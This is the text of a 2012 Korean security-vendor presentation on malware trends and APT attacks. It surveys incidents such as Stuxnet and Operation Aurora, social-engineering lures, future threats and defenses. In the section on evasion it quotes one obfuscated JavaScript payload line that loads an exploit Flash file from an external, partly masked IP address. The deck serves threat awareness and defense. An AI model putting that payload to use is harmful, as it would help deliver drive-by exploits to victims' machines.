2012년 상반기 악성코드 동향과 전망 - APT

2012. 10. 10

조시행 연구소장

Contents 01 APT

02 최근 APT 공격 사례

03 APT 공격 형태의 특징

04 미래 APT 공격 형태

05 APT 공격 대응 방안

01 APT(Advanced Persistent Threat)

4

1) 2012년도 악성코드 동향 리뷰

2012년 1분기 악성코드 유형별 피해분포 2012년 1분기 대표 진단명 Top 20

2012년 1분기 악성코드 유형별 신&변종 분포

5

2) Trojan, 국내 vs. 해외

한국 해 외

공격대상 온라인 게임 계정정보 &

아이템 인터넷 뱅킹정보

악성코드 Onlinegamehack Zeus, SpyEye

피해규모 추산불가 [FBI] 최소 7000만 달러에서 2억 200만 달러의 피해 발생 추정

공통점 1. 악성코드 제작툴을 통해서 끊임없이 변종들을 제작 및 유포 2. 악성코드 제작툴은 블랙마켓에서 상용으로 판매 3. "Zeus Bot 소스가 인터넷에 공개"

※ 국내 vs. 해외

6

3) Onlinegamehack 요약

0

5

10

15

20

25

30

35

40

45

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

Site 1

Site 2

Site 3

“2012년 4월 침해 사이트 통계”

7

“모리스(Morris) 웜은 Advanced Threat 이었다.”

“코드 레드(Code Red)와 님다(Nimda)는 Advanced Threat 이었다.”

1989

2001

방화벽(Firewall)이 나와서 방어할 수 있었다.

IPS가 나와서 막을 수 있었다.

2000년대 중반 “스파이웨어는 Advanced & Persistent Threat 이었다.”

안티 스파이웨어가 나와서 막을 수 있었다.

현재 “돈을 노리는 프로 해커의 타깃 공격은 Advanced & Persistent Threat 이다.”

해결책은?

4) APT 공격의 정의

8

5) APT (Advanced Persistent Threat)

APT는 2006년 무렵 미국 공군 사령부에서 사용하였던 군사 통신 용어 미국 공군 사령부에서는 미국 국방부와 통신시 확인된 특정 보안 위협 형태를 지칭 2010년 무렵 APT라는 용어가 민간 부분으로 전달 되며 의미가 확장

현재 민간 부분에서는 일반적으로 APT를 다음과 같이 정의

“다양한 보안 위협들을 양산하여 특정 대상에게 지속적으로 가하는 일련의 행위”

미국 공군 사령부와 미국 국방부 문장

9

6) APT 공격의 정의

Traditional Security Threats

단일 악성코드

감염PC에 대한 보안사고

불특정 다수

Advanced Security Threats

명확한 공격 목표

모듈화된 악성코드 추가 악성코드 업데이트

내부 주요 자원까지 접근 Long-term stealth 감염PC에 의한 전이 공격

02 최근 APT 공격 사례

11

1) N사 전산망 마비 사고

N사에서 발생한 침해 사고

2011년 4월 N사 전산망이 외부 공격으로 인한 시스템 손상으로 모든 업무 마비

외주 직원 노트북에 감염된 악성코드를 이용해 내부 시스템 침입

공격자는 P2P 프로그램으로 악성코드 유포 이후 7개월 동안 감시 후 공격 진행

P2P

프로그램

외주 직원

노트북

Attacker 내부 시스템

악성코드 유포

1

악성코드 감염

2

원격 제어 3

DB 서버의 데이터 삭제

4

12

2) S사 침해 사고

2011년 7월 S사 침해 사고로 3500만 명 고객 개인 정보 유출

무료 소프트웨어 업데이트 서버 해킹 후 정상 파일을 악성코드로 변경 후 유포

공격자는 8일만에 DB 관리자 권한 획득 후 DB 데이터를 분할 압축 후 외부 유출

S사에서 발생한 침해 사고

공격자

무료 소프트웨어 업데이트 서버

DB 서버

악성코드 유포

1

다른 피해 서버

악성코드 감염

2

DB 서버 접속

4

원격 제어 3

외부 서버로

데이터 전송 5

데이터 전송 6

13

3) 이란 원자력 발전소 스턱스넷(Stuxnet) 감염

2010년 7월 이란 원자력 발전소 시스템 파괴 목적의 스턱스넷(Stuxnet) 발견 MS 윈도우의 알려진 취약점 3개와 0-Day 취약점 2개를 악용해 유포

2011년 발견된 두큐(Duqu)와 2012년 발견된 플레임(Flame) 모두 이란 원자력 발전

소 관련 정보 수집 목적으로 유포

스턱스넷 악성코드의 감염과 동작 원리

14

4) 오퍼레이션 오로라(Operation Aurora) 침해 사고

2011년 1월 구글(Google) 기업 기밀 정보 탈취 목적의 침해 사고 발생 해당 침해 사고는 구글(Google) 외에 첨단 IT 기업 34개도 공격의 대상

공격은 MS 인터넷 익스플로러(Internet Explorer)의 0-Day 취약점 악용

이메일과 메신저로 악의적인 웹 사이트로 접속하는 링크 전달

오퍼레이션 오로라(Operation Aurora) 침해 사고

기업 내부 직원 공격자

이메일과 메신저로

웹 사이트 링크 전달

1

0-Day 취약점 악용

C&C 서버

링크 클릭으로

악성코드 감염

2

내부 시스템

원격 제어 3

내부 시스템 접근

4

03 APT 공격 형태의 특징

16

1) APT(Advanced Persistent Threat) 공격 형태의 증가

인터넷과 컴퓨터 시스템의 발달로 정부 기관 및 각 기업체에서 업무 자동화 도입 모든 업무 및 기밀 문서 역시 전자 문서와 같은 데이터 형태로 파일 서버에 보관

정치적, 경제적으로 고부가가치의 기밀 데이터 탈취 또는 파괴를 목표

공격 목적의 다양화로 APT 형태의 타깃 공격(Targeted Attack)이 과거에 비해 증가

시만텍(Symantec)에서 공개한 타깃 공격(Targeted Attack) 증가치

17

2) APT(Advanced Persistent Threat) 공격 대상의 확장

과거 APT 공격의 주된 목표는 정부 및 군사 기밀 정보 탈취임으로 정부 및 군사 기관이 주된 APT 공격의 대상

현재는 정치적, 경제적으로 고부가 가치의 데이터를 보유한 일반 기업 및 조직들 역시 APT공격의 주요 대상

• 정부 기관 기밀 문서 탈취

• 군사 기밀 문서 탈취 정부 기관

• 사이버 테러리즘 활동

• 사회 기간 산업 시스템 동작 불능

사회 기간

산업 시설

• 첨단 기술 자산 탈취

• 원천 기술 관련 기밀 탈취 정보 통신 기업

• 기업 지적 자산 탈취

• 기업 영업 비밀 탈취 제조 업종 기업

• 사회 금융 시스템의 동작 불능

• 기업 금융 자산 정보 탈취 금융 업종 기업

18

3) 고도화된 사회 공학 기법(Social Engineering) 개발과 적용

웹과 소셜 네트워크(Social Network)의 발달은 공격 대상의 개인 정보 수집 용이 수집한 개인 정보들로 공격 대상에게 최적화된 사회 공학 기법(Social Engineering)

개발 및 적용

EMC/RSA 침해 사고의 경우 내부 직원들에게 채용 정보 관련 메일로 위장

청첩장과 입사 지원서로 위장한 취약한 전자문서 파일들

19

4) 악성코드 및 취약점 관련 기술의 발전

악성코드 제작 및 취약점 개발 기술들의 발전은 보안 제품 탐지 우회와 APT 공격의 성공률을 높이는데 기여

악성코드는 셀프 업데이트(Self-Update), 보안 제품 무력화 기능 및 다수의 개별 기

능을 가진 파일들의 조합

취약점은 다양한 일반 소프트웨어의 알려진 취약점 또는 0-Day 취약점들을 악용

DarkComet RAT의 보안 기능 무력화 옵션 MS10-087 워드 취약점 악성코드 생성기

20

5) APT(Advanced Persistent Threat) 공격 기법의 다변화

현재까지 APT 공격의 주요 공격 기법은 이메일의 첨부 파일을 이용하는 형태 과거 첨부 파일이 실행 가능한 파일이었으나 최근에는 전자문서 형태로 변경

한국의 경우 무료 소프트웨어의 자동 업데이트 기능과 한국산 P2P 프로그램 악용

EMC/RSA 침해 사고에 사용된 이메일

04 미래 APT 공격 형태

22

1) 국지적인 일반 소프트웨어의 취약점 악용

APT 공격은 공격 대상이 속한 국가에서 사용 빈도가 높은 소프트웨어 취약점 악용

한국의 한글 소프트웨어, 곰 플레이어와 일본의 이치타로(Ichitaro) 취약점 악용 사회 공학 기법(Social Engineering) 역시 해당 국가의 문화나 사회적 이슈를 악용

한글 소프트웨어의 0-Day 취약점 악용 이치타로(Ichitaro)의 0-Day 취약점 악용

Source : Symantec

23

2) 모바일(Mobile) 악성코드를 이용한 공격

모바일 기기의 휴대성으로 인해 기업 내부 반, 출입이 용이함

2012년 2월 안드로이드 앱(Android App) 내부에 윈도우 스크립트(Script) 악성코드 포함 사례 발견

2012년 3월 스마트폰으로 수신된 SMS의 피싱(Phishing) 웹 사이트 URL

안드로이드 앱(Android App) 내부의 윈도우 스크립트(Script) 악성코드 SMS로 전달된 URL

24

3) 보안 제품의 탐지 우회 기법 개발과 적용

APT 공격에 대응하기 위한 보안 제품들의 탐지 우회를 위한 악성코드 제작 2012년 5월 어도비 플래시(Adobe Flash) CVE-2012-0779 취약점 악용한 워드

(Word) 파일은 취약점 코드 없이 단순 다운로더(Downloader) 역할만 수행

2012년 6월 스팸메일(SpamMail)은 웹 익스플로잇 툴킷(Web Exploit Toolkit)과 결합으로 공격의 다변화

javascript:eval(document.write(unescape('%3

Cembed%20src%3Dhttp://178.XX.XX.208/read

me.swf?info=789c3334b7d03337d73333d3333

2b0b032313106001f0e0374&infosize=0042000

0%3E%3C/embed%3E')))

워드 파일 내부의 취약한 플래쉬 파일 다운로드 코드 스팸메일과 웹 익스플로잇 툴 킷의 결합

05 APT 공격 대응 방안

26

1. 보안패치 빠짐없이 설치!!!

1) 예방 – 윈도우 보안패치

27

2. 응용 프로그램 패치 설치!!!

2) 예방 – 응용 프로그램 패치

28

3. 보안관련 정보 모니터링 !!!

3) 예방 – 보안 정보 모니터링

29

4) APT공격 대응 방안

보안 위협의 급속한 발전에 대응하기 위해 기업에 적합한 보안 정책 수립 필요 단일 보안 장비와 소프트웨어에 의존보다는 다각적 Defense in Depth 전략 필요

새로운 보안 위협에 신속한 대비와 대응을 위해서는 Security Intelligence 필요

보안 위협의 시작점이 내부 직원임으로 주기적인 보안 인식 교육 제공 필요

APT 공격에 대응하기 위한 보안 전략

30

사내 모든 파일의 움직임에 대한 ‘가시성’ 확보와 ‘실시간 행위 분석’ - 네트워크 관제와 내부 관제가 통합된 Convergence 관제 요구 - 클라우드 기반의 보안 기술 연구

5) APT공격 대응 방안 - 기술

thank you. 2012년 상반기 악성코드 동향과 전망 - APT